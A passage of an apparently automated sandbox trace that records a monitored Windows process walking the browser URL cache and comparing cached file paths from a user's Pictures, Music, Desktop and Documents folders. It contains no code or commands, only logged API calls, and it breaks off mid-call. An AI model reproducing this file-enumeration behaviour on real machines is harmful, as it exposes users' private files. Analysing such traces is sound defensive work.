lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif") returned -1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif") returned -1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ") returned -1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned -1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ/5-kbYj32q24z/fxz4eUE2J3.jpg") returned -1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/emg2isSn89KH1rCqnkVE.mp3") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png", _String2="file:///C:/Users/CIiHmnxMn6Ps/Videos/_4zPQ5H6/5Phl/d4uaT.flv") returned -1 [0067.296] wcslen (_String="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png") returned 0x4e [0067.296] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO/g%20IHHeID.png") returned -1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/4q9Ob0IBjJFOe2OqH/gT8kPO") returned -1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/NtipEAj_UPk8oLcHaMk.m4a") returned 1 [0067.296] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw/Zxr1UNIGqisvCNnn/jhDw-E/l_AsyXf/ryzcO9uW5%20na%20NkIn.m4a") returned -1 [0067.297] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/EY-85l4ZHmyKzZn.docx") returned 1 [0067.297] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/p72mwNsoaskX8JFjLk6c.wav") returned 1 [0067.297] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/laxv.gif") returned -1 [0067.297] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/cZp7-eTNxLNDQFn/k3vwoO771R7ylvuEX3.m4a") returned -1 [0067.297] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/eEYb71dCI6e0acGlSYj.mp3") returned 1 [0067.297] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/rH4AI2hPInY%20i8W-HJ_.jpg") returned 1 [0067.297] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/hnAk4r/MBESYMhlN%20bMw") returned -1 [0067.297] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/XAolOZ/q4-FpJ4h2n7/vBOyKHAuavu.gif") returned -1 [0067.297] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/Documents/d6QuM4BrMJV.csv") returned -1 [0067.297] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/pkrrVSCVV%20wDa1wJ") returned -1 [0067.298] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/Desktop/oAZoBv-GDm/ZdQ%20Yjy.m4a") returned 1 [0067.298] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/AppData/Roaming/CF59qvHy72f0q.mp3") returned 1 [0067.298] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/Music/MBfffFZaRO85qN2y7/tW6w.m4a") returned -1 [0067.298] wcscmp (_String1="file:///C:/Users/CIiHmnxMn6Ps/Documents/0V337LurZ/IBbGlJ1.pdf", _String2="file:///C:/Users/CIiHmnxMn6Ps/Pictures/_WVdo-/kbaJl3vP3jeAWydRPj/27QyANvwCf-Uw/81P7puIlOgX.jpg") returned -1 [0067.298] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.298] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.298] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.298] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.298] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.298] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.298] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.299] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.299] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.299] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.301] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.301] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.301] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.301] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.301] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.301] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.302] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.302] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.302] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.302] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.302] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.302] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.302] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.303] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.303] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.303] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.303] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.303] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.303] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.303] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.303] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.303] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.303] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.303] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.303] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.303] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.303] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.304] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.304] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.304] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.304] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.304] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.305] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.305] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.305] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.305] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.305] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.305] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.305] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.305] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.305] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.305] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.305] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.306] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.306] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.306] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.306] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.306] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.306] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.306] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.306] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.306] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.306] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.306] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.306] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.306] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.307] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.307] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.307] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.307] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.307] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.307] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.307] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.307] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.308] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.308] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.308] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c | out: lpNextCacheEntryInfo=0x770870, lpcbCacheEntryInfo=0x19825c) returned 1 [0067.308] FindNextUrlCacheEntryW (in: hEnumHandle=0x1, 